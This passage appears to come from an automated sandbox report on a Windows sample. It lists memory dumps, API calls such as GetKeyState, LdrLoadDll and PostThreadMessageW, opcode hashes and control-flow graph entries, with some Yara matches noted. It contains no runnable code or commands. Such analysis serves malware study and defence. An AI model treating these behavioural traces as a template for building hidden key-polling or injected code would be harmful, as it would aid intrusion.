                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0C04DB55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,?,?), ref: 058B1F95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1378638983-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07CE2422
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07CE2422
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303669618.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_180d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303669618.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_180d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303705467.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_181d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303705467.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_181d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303669618.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_180d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303669618.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_180d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303705467.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_181d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303705467.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_181d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                    • Instruction ID: 6a644054baf50e8b8fb2c4b4d3a02bed7ac0b3aa43fe76039285f52ea55911a4
                                                                                    • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                    • Instruction Fuzzy Hash: A111BB76504280DFCB12CF54D5C8B15BBA2FB84324F24C6A9D8498B69AC33AE40ACB61
                                                                                    APIs
                                                                                    • GetKeyState.USER32(00000001), ref: 0CCD465D
                                                                                    • GetKeyState.USER32(00000002), ref: 0CCD46A2
                                                                                    • GetKeyState.USER32(00000004), ref: 0CCD46E7
                                                                                    • GetKeyState.USER32(00000005), ref: 0CCD472C
                                                                                    • GetKeyState.USER32(00000006), ref: 0CCD4771
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: State
                                                                                    • String ID:
                                                                                    • API String ID: 1649606143-0
                                                                                    • Opcode ID: b048da52a2c2b0808b8c179c763124a716ffd458a9e2af89ceb7092c2817287c
                                                                                    • Instruction ID: c4d4e3e9e155840e4939d38d5eeac5abf3fc1d9466efd6e47185ac928bd7b4d4
                                                                                    • Opcode Fuzzy Hash: b048da52a2c2b0808b8c179c763124a716ffd458a9e2af89ceb7092c2817287c
                                                                                    • Instruction Fuzzy Hash: 3D419E718017498EEB25CF5AC5483AEBBF4BB09308F254409E259B7280C7B99185CFA5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: fff?
                                                                                    • API String ID: 0-4136771917
                                                                                    • Opcode ID: 38d545fcec970386c411edd5590e8b7ba681f38ab88f584e34018be4939526f7
                                                                                    • Instruction ID: 93d730957ebc645f2e7ad44ed6788e26b362277bb711b127a4e1d167f677f26c
                                                                                    • Opcode Fuzzy Hash: 38d545fcec970386c411edd5590e8b7ba681f38ab88f584e34018be4939526f7
                                                                                    • Instruction Fuzzy Hash: F862493281061ADFCF11DF60C984AD9B7B2FF99304F1586D5E9086B125EB71AAD6CF80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: fff?
                                                                                    • API String ID: 0-4136771917
                                                                                    • Opcode ID: 96cf87dc4416a7c16d6de7080555e73da74c45203c5d92c25ff974f37c04a6a9
                                                                                    • Instruction ID: e0fc52b9714a506d627f25cf6b02c9f633aece96a3ad2367dddd0966933fb8f0
                                                                                    • Opcode Fuzzy Hash: 96cf87dc4416a7c16d6de7080555e73da74c45203c5d92c25ff974f37c04a6a9
                                                                                    • Instruction Fuzzy Hash: 75225935900619DFCF11DF50C888AD9BBB2FF89304F158595D9086F266EB769A8ACF80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: v<$
                                                                                    • API String ID: 0-22720976
                                                                                    • Opcode ID: 22684ff3d8e6893315cdbba4607b7b111e48188ae35865fb426d7751751fb0ec
                                                                                    • Instruction ID: e14279a4ff30d511696f95e2c47d6eab7bb145abf656dfee8022c0428e69e16c
                                                                                    • Opcode Fuzzy Hash: 22684ff3d8e6893315cdbba4607b7b111e48188ae35865fb426d7751751fb0ec
                                                                                    • Instruction Fuzzy Hash: 5EE106B4E002198FDB14DFA9C594AAEBBF6FF89304F24816AD804AB355D731AD41CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 54e30d9edf0cdc8b8e900bb0ae63ccb5f0a758ac24866abf118f7cbe6a111ed3
                                                                                    • Instruction ID: 1bddcfb64da54bf367c3386876fe558e21d5d31d2e86404d1734b231cb1f9df3
                                                                                    • Opcode Fuzzy Hash: 54e30d9edf0cdc8b8e900bb0ae63ccb5f0a758ac24866abf118f7cbe6a111ed3
                                                                                    • Instruction Fuzzy Hash: 8C1271B04017458BE730CF69E94C9D93BB5BB853A8F904709D2616B2E9EBB8158FCF44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0e98e18348859cd9c8ce851d74cd18eda31142569356ac23444fd851cb608800
                                                                                    • Instruction ID: a29d04c872541e77edf9f1cbac42f253f756200a1376908ff9ecdb945567868f
                                                                                    • Opcode Fuzzy Hash: 0e98e18348859cd9c8ce851d74cd18eda31142569356ac23444fd851cb608800
                                                                                    • Instruction Fuzzy Hash: 64E1E7B4E002198FDB14DF99C594AAEBBF6FF89304F24816AD815AB355D730AD42CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 56b9a69df20a17362121f0fa5d2048220ad05411cdac70aef780636606f192cc
                                                                                    • Instruction ID: 9ef820b1da63696a49e93c06aad41b30a1661b7d40e32d7766c5df85ee04f142
                                                                                    • Opcode Fuzzy Hash: 56b9a69df20a17362121f0fa5d2048220ad05411cdac70aef780636606f192cc
                                                                                    • Instruction Fuzzy Hash: 91E1E8B4E002198FDB14DFA9C5949AEBBF6FF89304F24826AD814AB355D731AD41CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c77c72c55da6506e82d62272901aa654f1d3054e70ec132edc054532de6ad255
                                                                                    • Instruction ID: e68de190b25a3e3097a471524627d7c7ab5903419ba7dee8eb030622cf90fcd6
                                                                                    • Opcode Fuzzy Hash: c77c72c55da6506e82d62272901aa654f1d3054e70ec132edc054532de6ad255
                                                                                    • Instruction Fuzzy Hash: 8DE1F8B4E0021A8FDB14DFA9C590AAEBBF6FF89304F24816AD814AB355D7319D41CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a59b796f89ea2c91399d2039cca50d53b90ae8571d50a41b8043df83bccf6927
                                                                                    • Instruction ID: 7ac53e15780c055043e04bd9099ece73c0db7ae3b3788918f97da05a6d39e653
                                                                                    • Opcode Fuzzy Hash: a59b796f89ea2c91399d2039cca50d53b90ae8571d50a41b8043df83bccf6927
                                                                                    • Instruction Fuzzy Hash: E3E1E8B4E002198FDB14DFA9C5909AEBBF6FF89304F24816AD814AB355D735AD42CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 533075afc429691236107004ca07dc114cfb9fdf2c7bcb821152f853bdf705c2
                                                                                    • Instruction ID: 1ddb7e21449b45f155f062462fd1f792d0ae03aaa4e44fba21ebd32e5c427ed6
                                                                                    • Opcode Fuzzy Hash: 533075afc429691236107004ca07dc114cfb9fdf2c7bcb821152f853bdf705c2
                                                                                    • Instruction Fuzzy Hash: 80A16232F00205CFCF2ADFB5C4845AEBBB2FF84300B1546AAE905AB295DB75D955CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d9a6d47f0e607144c95b93cfe6a234b041edd258d154f1635422168ed9d3f2a9
                                                                                    • Instruction ID: e71ae712f88c83785c4f2a65ad80fe2f4d528ebea9d5d945b3ecc59d5fc8c0a5
                                                                                    • Opcode Fuzzy Hash: d9a6d47f0e607144c95b93cfe6a234b041edd258d154f1635422168ed9d3f2a9
                                                                                    • Instruction Fuzzy Hash: 12C103B18017458FE730CF68E848AD93BB5BB85364F544709D2616B2E9EBB8258FCF44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 52bde7f614c65ed642d858683670cca1b956d72f870a422604d2fd3f10a0b261
                                                                                    • Instruction ID: 644f27f04bca47c98b069c18aef682712f76966ba6a4b7c4c51cee0a49531123
                                                                                    • Opcode Fuzzy Hash: 52bde7f614c65ed642d858683670cca1b956d72f870a422604d2fd3f10a0b261
                                                                                    • Instruction Fuzzy Hash: 0C5155B3D4428D4BEB21FE71DC873EC7AB16B16219F7C849DC644B12A1F1EE84498B40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 809b4019f58378b3c9c0cb6578a44fea927a57971e260c54e1271bc139a25488
                                                                                    • Instruction ID: 792311f9e5143876a2b6a416976f94a085ed6e02c7a764c0ef8ae3676142d843
                                                                                    • Opcode Fuzzy Hash: 809b4019f58378b3c9c0cb6578a44fea927a57971e260c54e1271bc139a25488
                                                                                    • Instruction Fuzzy Hash: 905155B3D5428D8BEB20FE71DC873EC7AB26B16219F7C845DCA44B12A1F1EE84484B40

                                                                                    Execution Graph

                                                                                    Execution Coverage:1.3%
                                                                                    Dynamic/Decrypted Code Coverage:5.1%
                                                                                    Signature Coverage:8%
                                                                                    Total number of Nodes:138
                                                                                    Total number of Limit Nodes:9

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C15
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 71218bac6e36321b6e1c0b7bafe984d5bf27c0eeb1ac48b236bab1f2ac52d990
                                                                                    • Instruction ID: 2347c8aedde274631da5365697429d4869f71b6cbb4c3965c355fedac50688a3
                                                                                    • Opcode Fuzzy Hash: 71218bac6e36321b6e1c0b7bafe984d5bf27c0eeb1ac48b236bab1f2ac52d990
                                                                                    • Instruction Fuzzy Hash: 9A0175B1E0410DA7DF10DBE5DC42FDEB778AB14308F4041A6E90897240F634EB58CB95

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 216 42ca13-42ca4f call 404753 call 42dc33 NtClose
                                                                                    APIs
                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 39038782108515c71a78006feec956be81ea4cb259396ad082bb91abc1ea49dd
                                                                                    • Instruction ID: db200549b6b222148207f8d6f986de2405ec562ad3a5bd5d5972b8caa0164721
                                                                                    • Opcode Fuzzy Hash: 39038782108515c71a78006feec956be81ea4cb259396ad082bb91abc1ea49dd
                                                                                    • Instruction Fuzzy Hash: EDE04F352402147BC520AA5ADC41F9B776CDBC5714F408419FA5867141CAB4790187A5

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 230 1892b60-1892b6c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 5fa687cefb4bed332b44a6e534afdef5e7aa330407efea31a1429850b8197ed7
                                                                                    • Instruction ID: 3dd105c9e013075fb6c22b273cee4011d9ba095fcb9e233ecc3e284007499a11
                                                                                    • Opcode Fuzzy Hash: 5fa687cefb4bed332b44a6e534afdef5e7aa330407efea31a1429850b8197ed7
                                                                                    • Instruction Fuzzy Hash: 9F9002A170240007510571984424616400A97E1302B95C021E3018590DC5259A956236

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 232 1892df0-1892dfc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c2abb4add8bbe1f6d7d4b48b5343ecff96c443592a809f045cb4d8abcf43d1f5
                                                                                    • Instruction ID: 5b85ee20379013cd45c499ab08f64e2c55bd1aaac5bf668750203582afdb39d8
                                                                                    • Opcode Fuzzy Hash: c2abb4add8bbe1f6d7d4b48b5343ecff96c443592a809f045cb4d8abcf43d1f5
                                                                                    • Instruction Fuzzy Hash: 3090027170140417E11171984514707000997D1342FD5C412A2428558DD6569B56A232

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 231 1892c70-1892c7c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 38b4091f7ef8f04140b7be66df39233432638516406b9cab2002e2cd699eded9
                                                                                    • Instruction ID: b75f445c03672c3ff2a2d6f347882b0084dedaaa0f76db77e4c4c2774672b4b5
                                                                                    • Opcode Fuzzy Hash: 38b4091f7ef8f04140b7be66df39233432638516406b9cab2002e2cd699eded9
                                                                                    • Instruction Fuzzy Hash: 3390027170148807E1107198841474A000597D1302F99C411A6428658DC6959A957232

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 233 18935c0-18935cc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b9490f92b8a06dc7bae61d1e5f34d201646af68a460a588a01c8b1d75a83ab43
                                                                                    • Instruction ID: 2d27b2b106ebe35c52a2a4e6fdb0b1ab893c59a5b10d1660b55072ae33644f95
                                                                                    • Opcode Fuzzy Hash: b9490f92b8a06dc7bae61d1e5f34d201646af68a460a588a01c8b1d75a83ab43
                                                                                    • Instruction Fuzzy Hash: 1E900271B0550407E10071984524706100597D1302FA5C411A2428568DC7959B5566B3

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 0 414394-414396 1 414416-414425 0->1 2 414398 0->2 4 41442b-41445d call 404703 call 425193 1->4 5 414426 call 417ba3 1->5 3 41439a-41439f 2->3 3->3 6 4143a1-4143bd 3->6 11 41447d-414483 4->11 12 41445f-41446e PostThreadMessageW 4->12 5->4 6->1 12->11 13 414470-41447a 12->13 13->11
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 00255Of2$00255Of2
                                                                                    • API String ID: 1836367815-1393866396
                                                                                    • Opcode ID: 9860275234762560e8388b943211996fd88b7c3e1b0927fae24cd3b5fccd8234
                                                                                    • Instruction ID: 6841680170837e414d8ee68ffd14d9f00d419d1a13f685439b822e3a075bcc9b
                                                                                    • Opcode Fuzzy Hash: 9860275234762560e8388b943211996fd88b7c3e1b0927fae24cd3b5fccd8234
                                                                                    • Instruction Fuzzy Hash: 711129B2A121587BCB015AA09C81DEE7B6CDE81359B008069FD84B7201D3385D4747A5

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 00255Of2$00255Of2
                                                                                    • API String ID: 1836367815-1393866396
                                                                                    • Opcode ID: 2f9239dcebfa159d144bb7b503f5921b80f229cabf01115bab1575a27a12cceb
                                                                                    • Instruction ID: 271a2faaa591c9d6e6db1e9cfa2c7167dbdbf6c6ec6a1f64b8afccaa123d4c6c
                                                                                    • Opcode Fuzzy Hash: 2f9239dcebfa159d144bb7b503f5921b80f229cabf01115bab1575a27a12cceb
                                                                                    • Instruction Fuzzy Hash: 5811C6B2D0121C7EDB119AA19C82EEF7B7CDF45398F448069FA4477101D7785E078BA5

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 28 4143f3-414405 29 41440d-41445d call 42f5b3 call 417ba3 call 404703 call 425193 28->29 30 414408 call 42eba3 28->30 39 41447d-414483 29->39 40 41445f-41446e PostThreadMessageW 29->40 30->29 40->39 41 414470-41447a 40->41 41->39
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 00255Of2$00255Of2
                                                                                    • API String ID: 1836367815-1393866396
                                                                                    • Opcode ID: 5897684b17c08d4a3b3ea78ede45f027ff82af3d0e962109e8e6aa413f46b121
                                                                                    • Instruction ID: 641d106764bd7871e54fb13008b0cf28b80202d8a7b94a19ddae20a9823ec020
                                                                                    • Opcode Fuzzy Hash: 5897684b17c08d4a3b3ea78ede45f027ff82af3d0e962109e8e6aa413f46b121
                                                                                    • Instruction Fuzzy Hash: 2F0188B2D0111C7EDB11AAE19C81EEF7B7C9F41798F448069FA0477241D6785E0647B5

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 42 414484-41448a 43 414436-41443b 42->43 44 41448c-414499 42->44 51 414441-41445d 43->51 52 41443c call 425193 43->52 45 41449b-41449f 44->45 47 4144a1-4144a6 45->47 48 4144bd-4144c3 45->48 47->48 49 4144a8-4144ad 47->49 48->45 50 4144c5-4144c8 48->50 49->48 53 4144af-4144b6 49->53 54 41447d-414483 51->54 55 41445f-41446e PostThreadMessageW 51->55 52->51 56 4144c9-4144cc 53->56 57 4144b8-4144bb 53->57 55->54 58 414470-41447a 55->58 57->48 57->56 58->54
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 00255Of2$00255Of2
                                                                                    • API String ID: 1836367815-1393866396
                                                                                    • Opcode ID: e7479979648abe3028effaf804185b3def2a08024c7416f77b91b1d580e97353
                                                                                    • Instruction ID: 6aa23fba1bcc85a00ba6234f2f4255416af2484868e621a0598437d85ff41d12
                                                                                    • Opcode Fuzzy Hash: e7479979648abe3028effaf804185b3def2a08024c7416f77b91b1d580e97353
                                                                                    • Instruction Fuzzy Hash: DE117A71D145882EDB308EB44C81EEB7B689B85364F4883DEE998873A1D3398C82C759

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 206 42cd43-42cd84 call 404753 call 42dc33 RtlAllocateHeap
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,0041E91E,?,?,00000000,?,0041E91E,?,?,?), ref: 0042CD7F
